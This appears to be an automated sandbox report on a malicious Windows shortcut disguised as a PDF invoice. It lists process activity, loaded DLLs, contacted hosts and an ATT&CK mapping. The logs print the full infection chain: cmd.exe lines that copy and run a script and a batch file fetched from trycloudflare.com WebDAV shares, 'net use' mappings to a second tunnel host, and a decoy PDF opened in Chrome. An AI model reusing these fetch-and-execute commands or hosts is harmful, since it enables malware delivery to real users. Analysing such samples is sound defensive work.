File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\cscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DE-10192.pdf.lnk.download.lnk	Virustotal: Detection: 11%
Source: DE-10192.pdf.lnk.download.lnk	ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript "C:\Users\user\AppData\Local\Temp\coi.wsf"
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,15765900008559282355,18116320672109493881,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2032 /prefetch:3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: /delete /yes
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript "C:\Users\user\AppData\Local\Temp\coi.wsf"	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: /delete /yes	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,15765900008559282355,18116320672109493881,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2032 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\cscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll	Jump to behavior

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32

Jump to behavior

Source: DE-10192.pdf.lnk.download.lnk

LNK file: ..\..\..\..\Windows\System32\cmd.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.lnk

Static PE information: DE-10192.pdf.lnk.download.lnk

Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript "C:\Users\user\AppData\Local\Temp\coi.wsf"	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: /delete /yes	Jump to behavior

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Gathers information about network shares

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: /delete /yes
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: /delete /yes	Jump to behavior

Opens network shares

Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	11 Process Injection	111 Masquerading	OS Credential Dumping	2 Network Share Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	2 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DE-10192.pdf.lnk.download.lnk	11%	Virustotal		Browse
DE-10192.pdf.lnk.download.lnk	13%	ReversingLabs

Source	Detection	Scanner	Label
https://www.healyconsultants.com/favicon.ico	0%	Avira URL Cloud	safe
https://nissan-signature-rs-noise.trycloudflare.com/	0%	Avira URL Cloud	safe
https://typically-nut-personalized-syndication.trycloudflare.com/xo.bat	0%	Avira URL Cloud	safe
https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfPROCESSOR_ARCHI	0%	Avira URL Cloud	safe
https://nissan-signature-rs-noise.trycloudflare.com/ttings	0%	Avira URL Cloud	safe
https://nissan-signature-rs-noise.trycloudflare.com/ue	0%	Avira URL Cloud	safe
https://typically-nut-personalized-syndication.trycloudflare.com/coi.wsf	0%	Avira URL Cloud	safe
https://nissan-signature-rs-noise.trycloudflare.com/O#yX	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
healyconsultants.com	162.159.134.42	true	false	unknown
www.google.com	142.250.184.196	true	false	high
www.healyconsultants.com	unknown	unknown	false	high
50.23.12.20.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://typically-nut-personalized-syndication.trycloudflare.com/xo.bat	true	Avira URL Cloud: safe	unknown
https://typically-nut-personalized-syndication.trycloudflare.com/coi.wsf	true	Avira URL Cloud: safe	unknown
https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf	false		unknown
https://www.healyconsultants.com/favicon.ico	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://nissan-signature-rs-noise.trycloudflare.com/	net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfPROCESSOR_ARCHI	net.exe, 00000014.00000002.1436912928.000001E2659F4000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000014.00000002.1436671895.000001E265710000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000001B.00000002.1492189178.000002220A090000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000001B.00000002.1492228185.000002220A374000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nissan-signature-rs-noise.trycloudflare.com/ue	net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nissan-signature-rs-noise.trycloudflare.com/O#yX	net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nissan-signature-rs-noise.trycloudflare.com/ttings	net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.184.196	www.google.com	United States		15169	GOOGLEUS	false
162.159.134.42	healyconsultants.com	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4
192.168.2.6
192.168.2.10

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1637112
Start date and time:	2025-03-13 11:06:17 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DE-10192.pdf.lnk.download.lnk
Detection:	MAL
Classification:	mal92.spyw.evad.winLNK@30/6@6/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, dllhost.exe, rundll32.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.16.164.57, 142.250.185.206, 216.58.206.67, 66.102.1.84, 172.217.18.14, 142.250.186.174, 216.58.206.46, 142.250.185.110, 142.250.74.206, 142.251.40.206, 74.125.7.136, 142.250.185.174, 172.217.16.195, 216.58.212.131, 142.250.186.99, 216.58.212.142, 23.199.214.10, 20.12.23.50, 13.85.23.206, 20.109.210.53
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, typically-nut-personalized-syndication.trycloudflare.com, ctldl.windowsupdate.com, nissan-signature-rs-noise.trycloudflare.com, clientservices.googleapis.com, r3---sn-hp57yns7.gvt1.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, r3.sn-hp57yns7.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.159.134.42	http://www.hoppestad.no/	Get hash	malicious	Unknown	Browse	www.hoppestad.no/
	JeouiaPf03mHSBH.exe	Get hash	malicious	FormBook	Browse	www.goodneighbor.club/rk1u/?Srs=F12hDm1e4DcVWImHJ+2qK+It/RbJLRPuehC1dypgSVIG0HNIZQ44LV2EHRnZDsdrBZ/sqOYHya/GlclbNDRcdimcV6EHMYCTSyL+JOmQWa2hH4hFNXMeP+g=&FX=9v8XFZ
	Hesap_Hareketleri_20-07-2024.exe	Get hash	malicious	FormBook	Browse	www.goodneighbor.club/ua6w/?mt=JRT0JH&WRsp6Vo=VguSblgGE2gr11H1Oz6h6PWd6leymQOovKLAJAP7pFJ8CEff3rcgEuyXtoztwl+D0WsHUExksuBetSe4yiwXMKet7xpBLnDRm6RCyc0okkK0F26Usou9s5dt62QO+Z5203j3h16PZUV7
	Inquiry files v2.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.goodneighbor.club/qt04/
	nK1Y86mbzfbkwpB.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.goodneighbor.club/qt04/
	Petromasila 16072024.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.goodneighbor.club/arws/
	CC-CREDIT CARD-itineraries.exe	Get hash	malicious	FormBook	Browse	www.goodneighbor.club/ua6w/?L0WX3=VguSblgGE2gr11HyBT7GooCC0H7LwBOovKLAJAP7pFJ8CEff3rcgEuyXtoztwl+D0WsHUExksuBetSe4yiwXPO2P1jxDbVWq76NrnMwukHi5CRjf6Y7B46k=&_4B=Rxm4iVs
	http://heritageconsultants.com	Get hash	malicious	Unknown	Browse	heritageconsultants.com/
	http://www.heritageconsultants.com/	Get hash	malicious	Unknown	Browse	www.heritageconsultants.com/
	http://www.standardmediaindex.com	Get hash	malicious	Unknown	Browse	www.standardmediaindex.com/

Domains

